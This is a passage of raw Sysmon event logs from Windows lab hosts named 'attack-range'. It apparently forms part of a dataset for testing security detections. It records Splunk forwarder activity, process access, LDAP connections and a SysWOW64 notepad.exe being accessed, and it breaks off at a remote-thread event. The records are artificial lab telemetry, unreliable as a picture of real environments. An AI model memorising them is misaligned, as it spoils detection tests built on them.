354300x8000000000000000221282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:59.515{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51638-false10.0.1.12-8000- 10341000x8000000000000000297403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1772-6216-2907-000000003802}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1772-6216-2907-000000003802}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.140{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1772-6216-2907-000000003802}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:02.141{C8EA50B7-1772-6216-2907-000000003802}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:03.533{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9188CF057162979CC0985BA595B3761E,SHA256=5B0335E197BAD56EF7A4601783DBD8D293D27880BAB3C032E856DDE44CE7A6AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1773-6216-2A07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1773-6216-2A07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.761{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1773-6216-2A07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.757{C8EA50B7-1773-6216-2A07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.409{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0856A7C747B5F20F39689E73EDC78EA,SHA256=29889AD72AC24D144F2D2690BF1D5AA85FBA61517F67194144A08A83F999DD94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:04.564{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0A62A60151F1A2BEB27F83F7DD0BD4A,SHA256=D98CCABC5622311537E6718BB53453EFB978EB0B2A6E175859E2D2C5634058B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:04.430{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F1DB7C3BD11689927B0297A52D8F32,SHA256=2AEDE4A37D784189C7CD48A94CBB5E5C0E0CF58E1CB749FD52AC1A1107A4180F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:05.580{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1000F257B4E3015CA872D0F73D356536,SHA256=EA6477C0068DBED918CA7BB3253B3217CE22CD23D256CDB3F977A6A90A3986D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.582{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49448-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000297418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.468{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49447-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:03.468{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49447-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:05.446{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40416622EC01B7CBC2819E9479BDBE0D,SHA256=89AD7DE0A6C85F8DD06400CCA33699F3201257B4AB59BFA3F4E702A62DEF091F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:06.595{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0018F231F7BB5A660C35F47830F97426,SHA256=DED20FF096CE470557D8FD900F11374E9FA09EC9B57490034B16D3BA2707D398,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:06.460{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59EC4D67B9E8382D9788BBD1FE0BF15D,SHA256=759F0C781987730497E6F9D534652FFF383C0CA8CA5DF234FE6659DF4119458E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:07.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95AE9AA15E0AD18F3069B8272AB7871F,SHA256=AE2FB412FFD50EF164C0AA5F567263C2878FC6FF4EE8707D67FB2081F1FE933B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:07.477{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BF4941C579CB4CAD22B7353753DB3E5,SHA256=865FA83F841906A64948A97EE4A06448C131B299BAA513C1DC0EF6D815D90D08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:08.705{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD37487B4361B345759DF3C3A987FC98,SHA256=67C03AFC7F87B476D77489BF1C8D240B111973B7946702EE0FFA8A2494B4647C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.829{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DEF18AE27DB73EA83BF43DCB6008507,SHA256=9F418D3CBAA70028E0CF655C37B438B55200EA0DF4CFD3CABBE0EE9F1A5E47C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.561{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:08.561{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1778-6216-2B07-000000003802}6808C:\Windows\SysWOW64\notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000221289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:05.531{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51639-false10.0.1.12-8000- 824800x8000000000000000297451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 